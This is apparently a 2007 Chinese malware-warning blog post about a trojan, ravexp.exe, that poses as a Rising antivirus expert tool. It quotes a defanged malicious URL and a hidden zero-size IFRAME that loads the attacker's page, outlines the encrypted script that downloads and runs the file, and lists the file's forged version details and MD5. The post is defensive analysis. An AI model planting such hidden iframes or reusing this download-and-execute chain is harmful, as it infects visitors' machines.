小心冒充瑞星专家的病毒ravexp.exe

endurer 原创

2007-01-17 第1版

打开URL：
/------
hxxp://www.%6E%6A***%74%73%69***%73.com/images/ravexpert.jpg
------/

你会看到一张图片，其实这个URL指向的是一个网页，包含代码：

/------
＜IFRAME align=center name="target" frameBorder=0 height=0 scrolling=no src="hxxp://www.n**j**tsi**s.com/n**j**s**ex/vip**_reg*.htm"width=0＞＜/IFRAME＞
------/

vip*_reg**.htm 包含双重加密的脚本代码，第一重是escape()加密的JavaScript代码，第二重是自定义函数rechange(t)加密的VBScript代码，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 ravexp.exe，并利用Shell.Application 对象MircoLonge 的 ShellExecute 方法 来运行。

ravexp.exe 采用PESHiELD 0.1b MTE -> ANAKiN加壳，不仅使用类似瑞星的金狮子头作为图标，而且版本信息是伪造瑞星的：
/------
文件说明符 : D:/test/ravexp.exe
语言 : 中文(中国)
文件版本 : 19.01.0033
说明 : Rising Online Security Expert Support Center
版权 : Copyright ?? 1998 - 2008 Rising Corp. Ltd. All Rights Reserved
备注 :
产品版本 : 19.01.0033
产品名称 : espousal
公司名称 : Beijing Rising Technology Co., Ltd.
合法商标 : Rising
内部名称 : RavExp
源文件名 : RavExp.exe
创建时间 : 2007-1-17 22:45:58
修改时间 : 2007-1-17 22:46:1
访问时间 : 2007-1-17 22:47:17
大小 : 61440 字节 60.0 KB
MD5 : 8acbac220c5b383ca6e322c80ceab66b
------/